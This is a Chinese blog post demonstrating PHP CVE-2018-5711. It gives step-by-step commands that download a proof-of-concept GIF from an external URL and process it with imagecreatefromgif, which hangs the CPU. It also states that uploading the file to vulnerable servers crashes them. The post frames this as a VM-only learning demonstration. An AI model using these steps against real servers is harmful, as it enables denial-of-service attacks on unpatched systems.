景山小窝

  • 首页
  • WOW
  • 奇趣事
  • 手机控
  • 计算机
    • 好软件
    • 路由器
  • 黑苹果
  • 算号器
你若安好,便是晴天。
生气是拿别人的错误惩罚自己。
  1. 首页
  2. 计算机
  3. 正文

台湾黑客发现一张动图能宕掉一台服务器,运维这个腊月又要忙

2018-01-27 801点热度 0人点赞 0条评论

华夏人才济济呀,台湾的黑客orange发现了一个漏洞,编号为PHP CVE-2018-5711,这个漏洞能瞬间让支持php的服务器宕机,我用KALI 2017.3的虚拟机来演示一下。

一、检测我的虚拟机是否装有php-gd库

1、运行命令:php -m | grep -i gd

台湾黑客发现一张动图能宕掉一台服务器,运维这个腊月又要忙了

2、如果上图中没有出现gd,我们就需要装一下了。运行命令apt-get install php-gd。

台湾黑客发现一张动图能宕掉一台服务器,运维这个腊月又要忙了

二、生成恶意的gif文件

1、curl -L https://git.io/vN0n4 | xxd -r > poc.gif

台湾黑客发现一张动图能宕掉一台服务器,运维这个腊月又要忙了

2、运行top命令看下我的CPU使用率

台湾黑客发现一张动图能宕掉一台服务器,运维这个腊月又要忙了

3、测试恶意代码:

php -r 'imagecreatefromgif("poc.gif");'

台湾黑客发现一张动图能宕掉一台服务器,运维这个腊月又要忙了

CPU瞬间上升到了百分百,我想再运行一下top命令来个CPU对比图都做不到了,不得不重启我的KALI。

这个漏洞的影响版本范围如下:

PHP 5 < 5.6.33

PHP 7.0 < 7.0.27

PHP 7.1 < 7.1.13

PHP 7.2 < 7.2.1

如果服务器支持php-gd库的话,上传生成的poc.gif,服务器就宕掉了。最后我要郑重说下,这个漏洞肯定有的服务器还没有补,如果你去搞恶作剧的话,会给对方造成经济损失的,会违反国家安全法律,所以一定要在虚拟机里测试,明白这个漏洞的原理就行。

本作品采用 知识共享署名-非商业性使用 4.0 国际许可协议 进行许可
标签: 暂无
最后更新:2018-01-27

codeidc

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

codeidc

这个人很懒,什么都没留下

分类
  • WOW
  • 奇趣事
  • 好软件
  • 手机控
  • 未分类
  • 计算机
  • 路由器
  • 黑苹果
归档
  • 2023年2月
  • 2023年1月
  • 2022年11月
  • 2022年4月
  • 2022年3月
  • 2021年11月
  • 2021年10月
  • 2021年1月
  • 2019年6月
  • 2019年5月
  • 2019年4月
  • 2019年3月
  • 2019年1月
  • 2018年12月
  • 2018年11月
  • 2018年10月
  • 2018年9月
  • 2018年8月
  • 2018年6月
  • 2018年5月
  • 2018年4月
  • 2018年3月
  • 2018年2月
  • 2018年1月
  • 2017年12月

COPYRIGHT © 2021 codeidc.com. ALL RIGHTS RESERVED.

Theme Kratos Made By Seaton Jiang

豫ICP备2021031502号